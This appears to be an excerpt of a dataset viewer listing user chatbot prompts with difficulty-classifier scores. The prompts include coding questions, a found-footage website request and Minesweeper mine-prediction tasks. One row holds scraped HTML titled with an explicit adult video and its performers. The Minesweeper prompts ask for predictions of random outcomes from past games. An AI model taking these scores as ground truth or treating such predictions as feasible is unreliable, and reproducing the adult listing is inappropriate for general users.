2,099 | <html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>[SisLovesMe] Sophia Leone, Selina Bentz (Green Makes us Horny / 04.21.2023) - DoodStream</title> <link href="//i.doodcdn.co" rel="dns-prefetch" crossorigin><link href="//img.doodcdn.co" rel="dns-pre... | be7625209124fb3f6cf254793022173e | {
"intermediate": 0.28984978795051575,
"beginner": 0.5134698152542114,
"expert": 0.1966804414987564
} |
2,100 | @RequiresApi(Build.VERSION_CODES.O)
@Composable
fun ExpensesGraph(paddingValues: PaddingValues) {
val db = FirebaseFirestore.getInstance()
// Define your timeframes
val timeFrames = listOf("Daily", "Weekly", "Monthly", "Yearly")
val selectedIndex = remember { mutableStateOf(0) }
// Fetch and proce... | c3c0004bca6ea3d71a1b3206efd08ed5 | {
"intermediate": 0.41735514998435974,
"beginner": 0.4548041820526123,
"expert": 0.12784071266651154
} |
2,101 | you are a javascript and html expert.
tell me how i would get the elements with aria-name="testdiv" which in one of its nested sub nodes contains an element where the aria-label='hello" | ef06e370ee75122d43caa7eac45be675 | {
"intermediate": 0.48111605644226074,
"beginner": 0.35425716638565063,
"expert": 0.16462677717208862
} |
2,102 | Write web app that converts video to ascii art | 6967bcde90af29c1e0ddf09d34e03e44 | {
"intermediate": 0.30525949597358704,
"beginner": 0.23974786698818207,
"expert": 0.4549925625324249
} |
2,103 | Write me the code for an html website with a video player with the title and description of the video (The title is: TAPE 0247 And the description is: FOUND IN 1999) the webite should be named "CONFIDENTIAL FOOTAGE NET", the name of the wabite should be written at the top and should have a "MORE VIDEOS" link, the websi... | 433f696af65efd32f600aaaa8e084d13 | {
"intermediate": 0.4258998930454254,
"beginner": 0.19286705553531647,
"expert": 0.38123300671577454
} |
2,104 | In python, use machine learning to predict a minesweeper game on a 5x5 board. There are 3 bombs in the game, and you have data for the past 30 games, in a raw list that keeps getting longer. You need to predict 5 safe spots and 3 possible bomb locations. The data is: [2, 8, 17, 4, 11, 14, 13, 16, 18, 15, 18, 19, 6, 16,... | a2f52e785feb54cffd4ebfbc94cc563a | {
"intermediate": 0.08689673990011215,
"beginner": 0.06196201965212822,
"expert": 0.8511412739753723
} |
2,105 | What version of CHAT GPT are you running | 461bb25af138f945f5f868bf83ccf57e | {
"intermediate": 0.32548877596855164,
"beginner": 0.18178360164165497,
"expert": 0.49272769689559937
} |
2,106 | In python, you need to predict a minesweeper game on a 5x5 field. You need to predict 4 safe spots in a 3 mines game. You have data for the past games played: [5, 12, 13, 4, 17, 19, 4, 18, 21, 1, 6, 11, 7, 15, 22, 14, 18, 19, 1, 19, 20, 9, 16, 17, 1, 19, 20, 6, 14, 24, 15, 20, 22, 7, 18, 21, 4, 16, 23, 5, 11, 19, 5, 6,... | 3ef65220d5ebf4ac25f363b829e365e7 | {
"intermediate": 0.2129819244146347,
"beginner": 0.12134087830781937,
"expert": 0.6656771898269653
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.